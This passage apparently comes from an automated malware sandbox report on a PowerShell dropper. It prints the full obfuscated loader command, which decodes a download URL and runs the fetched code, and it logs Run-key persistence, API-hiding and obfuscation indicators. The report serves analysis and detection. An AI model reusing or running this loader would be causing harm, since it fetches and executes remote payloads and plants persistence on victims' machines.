;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

17_2_004044A4

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0468B8D8 push eax; iretd	5_2_0468B8D9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_074709F0 push eax; mov dword ptr [esp], ecx	5_2_07470E7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D72806 push ecx; ret	10_2_23D72819
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044693D push ecx; ret	17_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044DB70 push eax; ret	17_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044DB70 push eax; ret	17_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00451D54 push eax; ret	17_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044B090 push eax; ret	18_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_0044B090 push eax; ret	18_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_00444E71 push ecx; ret	18_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00414060 push eax; ret	19_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00414060 push eax; ret	19_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00414039 push ecx; ret	19_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_004164EB push 0000006Ah; retf	19_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00416553 push 0000006Ah; retf	19_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00416555 push 0000006Ah; retf	19_2_004165C4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_0482CF28 pushfd ; ret	20_2_0482CF31
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_04823AD9 push ebx; retf	20_2_04823ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_076B0E67 push eax; mov dword ptr [esp], ecx	20_2_076B0E7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C809AD push ecx; mov dword ptr [esp], ecx	26_2_21C809B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0329333A push ss; iretd	26_2_0329333B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0329426F push cs; ret	26_2_03294279
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0329228B push FFFFFFDFh; iretd	26_2_0329228D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_03293AF5 push 624F56A1h; ret	26_2_03293AFA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0328FFBC push ecx; retf	26_2_0328FFE9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_0328EE6C push esi; retf	26_2_0328EE97

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Boot Survival

Creates multiple autostart registry keys

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden			Jump to behavior

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Almindeligheden	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bilateralities

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 18_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_004047CB

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
